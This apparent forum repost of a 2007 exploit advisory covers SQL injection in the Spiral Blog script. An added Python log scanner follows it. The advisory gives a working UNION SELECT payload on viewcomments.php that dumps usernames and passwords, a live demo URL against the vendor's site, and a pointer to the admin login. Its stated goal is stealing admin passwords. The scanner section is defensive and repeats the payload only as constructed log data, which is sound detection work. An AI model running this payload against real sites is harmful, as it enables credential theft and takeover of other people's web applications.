Gonzalez
Posted June 28, 2007

--==+================================================================================+==--
--==+ Spiral Blog SQL Injection Vulnerabilities +==--
--==+================================================================================+==--

AUTHOR: t0pP8uZz & xprog
SCRIPT DOWNLOAD: N/A
SITE: http://www.spiralscripts.co.uk
DORK: N/A
DESCRIPTION: get users/admins password

EXPLOITS:
EXPLOIT 1: http://www.server.com/SCRIPT_PATH/viewcomments.php?blogid=-1 UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,6 from usertable--

EXAMPLES:
EXAMPLE ON DEMO: http://www.spiralscripts.co.uk/demoscripts/blog/viewcomments.php?blogid=-1 UNION ALL SELECT 1,2,3,concat(username,0x3a,password),5,6 from usertable--

NOTE/TIP: admin login: http://www.server.com/BLOG_PATH/admin
GREETZ: milw0rm.com, H4CKY0u.org, ~removed~ !
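
A defender-side check for the request pattern in the advisory above, as an added example that is not part of the original post: it scans web access logs for `viewcomments.php` requests whose `blogid` is not a plain integer. The log lines, paths and addresses are constructed, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
203.0.113.5 - - [28/Jun/2007:10:01:02 +0000] "GET /blog/viewcomments.php?blogid=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [28/Jun/2007:10:03:40 +0000] "GET /blog/viewcomments.php?blogid=-1%20UNION%20ALL%20SELECT%201,2,3,concat(username,0x3a,password),5,6%20from%20usertable-- HTTP/1.1" 200 734 "-" "Mozilla/5.0"
198.51.100.7 - - [28/Jun/2007:10:04:11 +0000] "GET /blog/viewcomments.php?blogid=7' HTTP/1.1" 500 310 "-" "Mozilla/5.0"
203.0.113.9 - - [28/Jun/2007:10:05:00 +0000] "GET /blog/index.php?page=2 HTTP/1.1" 200 8044 "-" "Mozilla/5.0"
"""

# client IP, request target and status code from one combined-format line
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
INT_RE = re.compile(r"[0-9]+")  # the only shape a blog id should have
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.I | re.S)


def scan(log_text):
    """Return (ip, status, verdict, decoded_value) for each suspicious blogid."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        url = urlsplit(m["target"])
        if not url.path.endswith("/viewcomments.php"):
            continue
        # parse_qs percent-decodes, so encoded payloads are compared in clear text
        for value in parse_qs(url.query, keep_blank_values=True).get("blogid", []):
            if INT_RE.fullmatch(value):
                continue  # well-formed id, nothing to report
            verdict = "union-select" if UNION_RE.search(value) else "non-integer"
            findings.append((m["ip"], int(m["status"]), verdict, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `union-select` hit answered with status 200 deserves the first look, since the server did not reject the request.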